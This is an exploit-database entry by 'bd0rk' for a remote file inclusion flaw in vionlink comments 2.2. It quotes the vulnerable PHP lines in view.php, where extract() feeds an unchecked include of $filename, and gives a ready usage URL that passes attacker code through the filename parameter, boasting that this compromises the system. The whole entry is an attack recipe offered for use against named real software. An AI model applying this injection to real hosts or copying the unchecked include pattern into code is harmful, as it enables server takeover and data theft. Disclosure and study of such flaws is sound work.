Vionlink comments 2.2 Remote File Include Vulnerability

2014-05-06T00:00:00
ID 1337DAY-ID-22213
Type zdt
Reporter bd0rk
Modified 2014-05-06T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit-Title: vionlink comments 2.2 Remote File Include Vulnerability
# Date: 2014-05-06
# Author: bd0rk
# Software-Link: http://www.vionlink.de/downloadcounter.php?version=v_comments2.2
# Affected-Version: 2.2
# G00gle-D0rK: n/a --->script-kiddieprotected
# Tested on: Ubuntu-Linux 14.04 LTS
# Contact: twitter.com/bd0rk

Sh0rT-Description:

I found vulnerable php-sourcecode in directory /vionlink.comments/view.php
--------------------------------------------------------------------------
In-Line 29-30:  if(is_array($data)){extract($data);}
               
        @include $filename; echo cright;    
--------------------------------------------------------------------------

So an attacker can inject some php-shellcode about the parameter $filename.

Access-Possibilities: Compromise the system for example!

[+]Usage: http://[host]/vionlink.comments/view.php?filename=[EVILCODE]



### The 25 years old german Hacker bd0rk ###

#  0day.today [2016-04-20]  #